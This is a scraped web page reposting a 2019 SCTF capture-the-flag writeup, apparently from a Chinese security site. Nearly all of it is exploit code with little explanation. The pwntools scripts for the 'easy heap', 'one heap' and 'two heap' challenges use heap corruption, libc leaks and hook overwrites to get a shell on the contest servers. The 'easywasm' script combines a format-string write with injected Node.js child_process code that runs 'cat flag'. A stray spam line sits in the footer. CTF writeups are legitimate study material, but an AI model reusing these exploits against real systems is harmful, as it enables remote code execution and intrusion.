<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>
    2019SCTF-Writeup
    展開或關閉
    web
    math-is-fun math-is-fun2 flag shop easy-web babyEoP
    crypto
    babygame warmup
    re
    Who is he Creakme babyre strange apk
    pwn
    匯總

    匯總

    2019SCTF-Writeup /

    easy heap

    from pwn import *
context(arch = 'amd64',os='linux')
def add(size):
    p.recvuntil('>>')
    p.sendline('1')
    p.recvuntil('Size')
    p.sendline(str(size))
    p.recvuntil('0x')
    return p.recv(12)

def dele(idx):
    p.recvuntil('>>')
    p.sendline('2')
    p.recvuntil('Index')
    p.sendline(str(idx))

def edit(idx,cont):
    p.recvuntil('>>')
    p.sendline('3')
    p.recvuntil('Index')
    p.sendline(str(idx))
    p.recvuntil('Content')
    p.send(cont)
libc = ELF('./libc.so.6')
#p = process('./easy_heap',env={'LD_PRELOAD':'./libc-2.23.so'})
p = remote('132.232.100.67', 10004)
p.recvuntil('0x')
mmap_addr = int(p.recvuntil('\n')[:-1],16)
print hex(mmap_addr)
ptr_addr = int(add(0x100-8),16)#0
info("ptr:0x%x",ptr_addr)
add(0xf8)#1
add(0xf8)#2
edit(0,p64(0)+p64(0xf1)+p64(ptr_addr-0x18)+p64(ptr_addr-0x10)+(0x100-8-16-8-16)*'\x00'+p64(0xf0))
dele(1)
#edit(0,p64(0)+p64(0)+p64(0x200)+p64(ptr_addr-8)+p64(0x90)+p64(ptr_addr+0x30-8)+p64(0)+p64(0x91)+'\x00'*0x80+p64(0x90)+p64(0x91)+'\n')

add(0x80)#1
add(0x80)#3
add(0x80)#4
dele(1)
dele(4)
edit(0,p64(0)+p64(0)+p64(0x200)+p64(ptr_addr-8+0x50)+p64(0x200)+p64(mmap_addr)+p64(0)*2+p64(0x80)+'\x28\n')
edit(3,p64(ptr_addr+0x40)+'\n')
add(128)
a = 0x16# int(raw_input("a"),16)
edit(0,p64(0x200)+'\x20'+chr(a)+'\n')
edit(5,p64(0xfbad3c80)+p64(0)*3+p8(0)+'\n')
p.recvuntil(p64(0)*3)
addr = u64(p.recv(8))
libc_base = addr - (0x7f7af9dfa6e0-0x7f7af9a37000)
print hex(libc_base)
free_hook = libc_base+libc.symbols['__free_hook']
sh = asm(shellcraft.sh())
edit(1,sh+'\n')
edit(0,p64(0x200)+p64(free_hook)+'\n')
edit(5,p64(mmap_addr)+'\n')
p.sendline('2')
p.sendline('0')
p.interactive()

    one heap

    用hbase爆破pbase的1/8192變態house of Roman + 1/1的house of three

    from pwn import *
context.arch = "amd64"
context.aslr = False
libc = ELF("./libc-2.27.so")

def add(size,data,shift = False):
    io.sendlineafter("choice:",str(1))
    io.sendlineafter("size",str(size))
    if(shift == False):
        io.sendlineafter("content:",data)
    else:
        io.sendafter("content:",data)
def rm():
    io.sendlineafter("choice:",str(2))
while(True):
    try:
        #io = process("./one_heap",env = {"LD_PRELOAD":"./libc-2.27.so"})
        io = remote('47.104.89.129',10001)
        add(0x60,'0000')
        rm()
        rm()
        add(0x60,'\x20\x60\x64')
        add(0x60,' ')
        add(0x60,'\n',shift = True)
        add(0x60,p64(0xfbad1880)+p64(0)*3+"\x58")
        lbase = u64(io.recv(6).ljust(8,'\x00'))-libc.sym['_IO_file_jumps']
        success("LBASE -> %#x"%lbase)
        add(0x40,'0000')
        rm()
        rm()
        add(0x40,p64(lbase+libc.sym['__realloc_hook']))
        add(0x40,p64(lbase+libc.sym['__realloc_hook']))
        one = 0x4f2c5
        add(0x40,p64(lbase+one)+p64(lbase+libc.sym['realloc']+0xe))
        add(0x30,"cat flag\x00")
        #gdb.attach(io,'handle SIGALRM nostop noprint')
        io.interactive()
        raw_input()
    except Exception,e:
        info(str(Exception)+str(e))
        io.close()

    two heap

    0x1 0x8 0x10 0x18繞size check(都是生成0x20的堆塊)

    from pwn import *
context.arch = 'amd64'
#context.aslr = False
libc = ELF("./libc-2.26.so")

def add(size,data):
    io.sendlineafter("choice:","1")
    io.sendlineafter("size:\n",str(size))
    io.sendafter("note:\n",data)
def rm(idx):
    io.sendlineafter("choice:","2")
    io.sendlineafter("index:\n",str(idx))
while(True):
    try:
        io = remote('47.104.89.129',10002)
        #io = process("./two_heap",env = {"LD_PRELOAD":"./libc-2.26.so"})
        io.sendlineafter("SCTF:\n","%a%a%a%a%a")
        io.recvuntil("0x0.0")
        lbase = (int(io.recv(11),16)<<4)-libc.sym['_IO_2_1_stdout_']
        info("LBASE -> %#x"%lbase)
        add(1,'')
        rm(0);rm(0);ls
        add(8,p64(lbase+libc.sym['__free_hook']))
        add(0x10,'\n')
        add(24,p64(lbase+libc.sym['system'])+'\n')
        add(40,"/bin/sh\x00"+"\n")
        io.sendline("2")
        io.sendline("4")
        #gdb.attach(io,'handle SIGALRM nostop noprint')
        io.interactive()
        raw_input()
    except Exception,e:
        info(str(e))
        io.close()

    easywasm

    出題人:0xd5f 解題人數:0 最終分數:1000

    程序存在一個結構體用于保存信息記錄

    C struct { char *username; int password; char *introduction; void (*state)(const char *); } record;

    先說三個函數邏輯

    registered()用于初始化record結構體

    profile()用于打印username和introduction

    login()用于驗證username和password并通過state函數指針返回登錄成功或失敗的狀態信息

    因為程序存在Z_envZ__emen_run_Z_vi,只需要改變state即可,但是如果成功調用,還需要泄露出password
    其中profile()存在一個溢出漏洞和一個格式化字符串漏洞,通過溢出,我們可以控制任意寫的地址,然后再leak出password即可,許多payload的細節可以調試知道
    不過帶師傅們好像更熱衷于ddos,Orz
    exp

    import requests

url = 'http://47.104.89.129:23333/'

registered = url + 'registered' profile = url + 'profile' login = url + 'login'

username = 'username' password = 'password' introduction = 'introduction'

payload = '' payload += 'A'*7 payload += ''' const exec=require("child_process").exec; exec("cat flag", function(error,stdout,stderr){process.stdout.write(stdout);}); '''.ljust(0x7f, ' ') payload += '//\x3C\x0D\x00'

params = { username: '%2$0141d%1$n', introduction: payload } requests.get(registered, params=params) req = requests.get(profile) passwd = req.text.lstrip('Welcome, ').rstrip('Your introduction: AAAAAAA')

params = { username: '%2$0141d%1$n', password: passwd } requests.get(login, params=params)

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    GQQQy
    資深作者 200 聲望
    老年二進制選手,副業虛擬機
    討論數量: 0
    只看當前版本


    暫無話題~
    ? 2021 WANGAN.COM 幫助網安從業者成長;關注產業發展,做網絡安全忠誠衛士!
    亚洲 欧美 自拍 唯美 另类